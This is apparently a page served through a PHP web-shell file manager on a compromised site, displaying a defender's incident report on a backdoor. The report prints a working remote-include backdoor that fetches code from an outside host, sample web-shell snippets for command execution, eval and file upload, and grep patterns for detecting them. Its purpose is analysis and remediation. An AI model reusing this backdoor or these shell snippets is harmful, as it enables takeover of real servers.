T.ME/BIBIL_0DAY
CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gositeme/domains/soundstudiopro.com/public_html/MALICIOUS_CODE_ANALYSIS.md
# 🚨 MALICIOUS CODE ANALYSIS - 445367/index.php BACKDOOR

**Date:** December 12, 2025  
**Status:** CRITICAL SECURITY THREAT ANALYZED

---

## 🔍 BACKDOOR CODE ANALYSIS

### File: `445367/index.php` (DELETED ✅)

```php
<?php
$url = "https://51la.zvo2.xyz/a2.txt";  // Remote malicious code URL

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);

if ($result === false) {
    echo "Error: " . "PD9waHA=" . curl_error($ch);  // "PD9waHA=" = base64("<?php")
} else {
    // Save downloaded code to temp file
    $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
    file_put_contents($tempFile, $result);

    // Execute the downloaded code
    include $tempFile;

    // Delete temp file after execution (hides evidence)
    unlink($tempFile);
}
curl_close($ch);
```

---

## 🚨 WHAT THIS BACKDOOR DOES

### Step-by-Step Attack Process:

1. **Downloads Malicious Code:**
   - Connects to `https://51la.zvo2.xyz/a2.txt`
   - Downloads PHP code from attacker's server
   - This code can be changed at any time by attacker

2. **Executes Remotely Downloaded Code:**
   - Saves code to temporary file
   - Includes/executes it with `include $tempFile`
   - **This gives attacker FULL control**

3. **Hides Evidence:**
   - Deletes temp file after execution
   - Makes it hard to detect what was executed
   - No trace left on server

---

## 💀 CAPABILITIES OF THIS BACKDOOR

### What the Attacker Can Do:

1. **Remote Code Execution (RCE):**
   - Execute ANY PHP code
   - Run system commands
   - Access file system

2. **File System Access:**
   - Read any file
   - Write/modify any file
   - Delete files
   - Upload files

3. **Database Access:**
   - Read database credentials
   - Execute SQL queries
   - Modify/delete data
   - Create backdoor users

4. **System Access:**
   - Execute shell commands
   - Access other servers
   - Install additional backdoors
   - Access private_html directory

5. **Steal Data:**
   - User credentials
   - API keys
   - Payment information
   - Source code

---

## 🔍 WHAT THE DOWNLOADED CODE LIKELY CONTAINS

### Typical Remote Backdoor Payloads:

**1. File Manager:**
```php
// Allows browsing, uploading, downloading files
if (isset($_GET['ac']) && $_GET['ac'] == 'u_h_s_1') {
    // File manager interface
    // This matches the log entry: ac=u_h_s_1
}
```

**2. Command Execution:**
```php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);  // Execute system commands
}
```

**3. Database Access:**
```php
// Connect to database and execute queries
$pdo = new PDO(...);
$pdo->exec($_POST['sql']);
```

**4. PHP Code Execution:**
```php
if (isset($_POST['code'])) {
    eval($_POST['code']);  // Execute arbitrary PHP
}
```

**5. File Upload:**
```php
if (isset($_FILES['file'])) {
    move_uploaded_file($_FILES['file']['tmp_name'], $_POST['path']);
}
```

---

## 📊 LOG ENTRY ANALYSIS

### The Log Shows:
```
GET /445367/about.php?ac=u_h_s_1&api=&path=/home/gositeme/domains/soundstudiopro.com/private_html&t=...&s=3
```

**This confirms:**
- `ac=u_h_s_1` = File manager action (upload/host/shell)
- `path=.../private_html` = Trying to access private_html directory
- `t=` and `s=` = Session tokens
- **Response: 200 OK (607KB)** = File manager interface was served

**This means:**
- Attacker successfully accessed file manager
- Was browsing your file system
- Had access to private_html directory
- Could upload/download/execute files

---

## 🚨 SECURITY IMPACT

### What Was Compromised:

1. **Full Server Access:**
   - Remote code execution
   - File system access
   - Database access
   - System command execution

2. **Data at Risk:**
   - All files on server
   - Database contents
   - User credentials
   - API keys
   - Payment information
   - Source code

3. **Potential Damage:**
   - Files modified/deleted
   - Backdoor users created
   - Additional backdoors installed
   - Data stolen
   - System compromised

---

## ✅ REMEDIATION STATUS

### Completed:
- ✅ Deleted `445367/index.php` backdoor
- ✅ Deleted `445367/about.php` file manager
- ✅ Blocked attacker IP `198.204.236.234`
- ✅ Secured `445367/` directory

### Still Needed:
- ⚠️ Check for other backdoors
- ⚠️ Review all file modifications
- ⚠️ Check database for unauthorized users
- ⚠️ Change all passwords
- ⚠️ Review access logs
- ⚠️ Check private_html directory
- ⚠️ Full security audit

---

## 🛡️ PREVENTION MEASURES

### 1. File Integrity Monitoring
```bash
# Monitor for new PHP files
find . -name "*.php" -type f -newer /path/to/reference
```

### 2. Network Monitoring
```bash
# Monitor for outbound connections to suspicious domains
netstat -an | grep zvo2.xyz
```

### 3. Access Log Monitoring
```bash
# Monitor for suspicious access patterns
tail -f /var/log/apache2/access.log | grep -E "445367|about\.php|radio\.php"
```

### 4. File Permissions
```bash
# Ensure PHP files aren't world-writable
find . -name "*.php" -perm -002
```

---

## 📋 IMMEDIATE ACTIONS REQUIRED

1. **Change ALL Passwords:**
   - Database password
   - FTP/SFTP password
   - Admin user passwords
   - API keys
   - Stripe keys

2. **Check Database:**
   ```sql
   SELECT * FROM users WHERE created_at > '2025-12-12 21:00:00';
   SELECT * FROM users WHERE last_login > '2025-12-12 21:00:00';
   ```

3. **Review File Modifications:**
   ```bash
   find . -type f -newermt "2025-12-12 21:30:00" -name "*.php"
   ```

4. **Check for Other Backdoors:**
   ```bash
   find . -name "*about.php" -type f
   find . -name "*radio.php" -type f
   find . -name "*.php" -exec grep -l "eval\|base64_decode\|curl_exec" {} \;
   ```

5. **Review Access Logs:**
   ```bash
   grep "198.204.236.234" /var/log/apache2/access.log
   grep "445367" /var/log/apache2/access.log
   ```

---

**Status:** 🚨 **CRITICAL - FULL SECURITY AUDIT REQUIRED**

This backdoor gave the attacker complete control of your server. Immediate security audit is essential.


CasperSecurity Mini